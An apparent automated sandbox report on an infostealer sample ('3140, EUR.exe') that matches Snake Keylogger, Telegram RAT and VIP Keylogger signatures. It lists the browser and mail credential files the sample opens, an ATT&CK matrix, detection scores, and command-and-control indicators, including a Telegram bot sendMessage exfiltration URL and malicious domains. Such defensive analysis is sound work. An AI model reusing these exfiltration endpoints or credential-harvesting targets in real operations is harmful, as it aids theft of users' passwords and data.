Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Users\user\Desktop\3140, EUR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\3140, EUR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\3140, EUR.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 8.2.3140, EUR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4119574462.000000000043E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3140, EUR.exe	47%	ReversingLabs	ByteCode-MSIL.Spyware.Negasteal
3140, EUR.exe	44%	Virustotal		Browse
3140, EUR.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	47%	ReversingLabs	ByteCode-MSIL.Spyware.Negasteal
C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	44%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
reallyfreegeoip.org	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
quicklyserv.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://api.telegram.org	1%	Virustotal		Browse
http://quicklyserv.com	0%	Virustotal		Browse
https://api.telegram.org/bot	2%	Virustotal		Browse
https://chrome.google.com/webstore?hl=en	0%	Virustotal		Browse
https://www.office.com/	0%	Virustotal		Browse
https://www.office.com/lB	0%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a	1%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	132.226.8.169	true	false	0%, Virustotal, Browse	unknown
quicklyserv.com	45.143.99.52	true	true	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
